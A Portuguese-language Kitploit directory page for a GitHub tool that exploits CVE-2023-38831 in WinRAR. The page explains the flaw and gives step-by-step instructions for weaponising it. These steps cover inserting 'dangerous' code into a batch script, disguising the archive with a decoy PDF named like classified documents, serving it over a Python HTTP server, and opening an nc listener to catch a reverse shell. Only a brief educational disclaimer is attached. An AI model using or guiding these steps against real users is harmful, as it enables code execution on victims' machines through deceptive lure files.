Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/asepsaepdin/cve-2023-38831
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubasepsaepdin/cve-2023-38831

CVE-2023-38831

Gera um arquivo RAR malicioso explorando CVE-2023-38831 no WinRAR para executar código arbitrário quando um usuário abre um arquivo benigno, com um gerador de exploração baseado em Python e configuração de ouvinte.

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-38831 - Vulnerabilidade de Execução de Código no WinRAR da RARLAB

Python


⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada

Autores do Exploit Original

Muito grato ao autor original do PoC b1tg e à Group-IB Threat Intelligence

Descrição

O WinRAR da RARLAB antes da versão 6.23 permite que atacantes executem código arbitrário quando um usuário tenta visualizar um arquivo benigno dentro de um arquivo ZIP.

gambar

O problema ocorre porque um arquivo ZIP pode incluir um arquivo benigno (como um arquivo .JPG comum) e também uma pasta que tem o mesmo nome do arquivo benigno, e o conteúdo da pasta (que pode incluir conteúdo executável) é processado durante uma tentativa de acessar apenas o arquivo benigno. Isso foi explorado ativamente entre abril e agosto de 2023.

Demonstração

winrar


Guias Passo a Passo

  1. Primeiro, modifique o arquivo script.bat com seu código de execução perigoso

  2. Insira o arquivo isca, é recomendado que seja uma imagem (.png, jpg) ou um documento (.pdf)

  3. Execute o comando para gerar o arquivo de exploit

    root@kitploit:~
    python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  poc.rar
    
  4. Envie o arquivo de exploit para a máquina alvo usando python http.server, por exemplo:

    root@kitploit:~
    python -m http.server
    
  5. Configure o Listener na sua máquina atacante:

    root@kitploit:~
    nc -nlvp 4444
    
  6. Baixe e abra o arquivo de exploit com o WinRAR anterior à versão 6.23


Créditos

  • https://github.com/b1tg/CVE-2023-38831-winrar-exploit
  • https://nvd.nist.gov/vuln/detail/CVE-2023-38831
  • https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Baixar ferramenta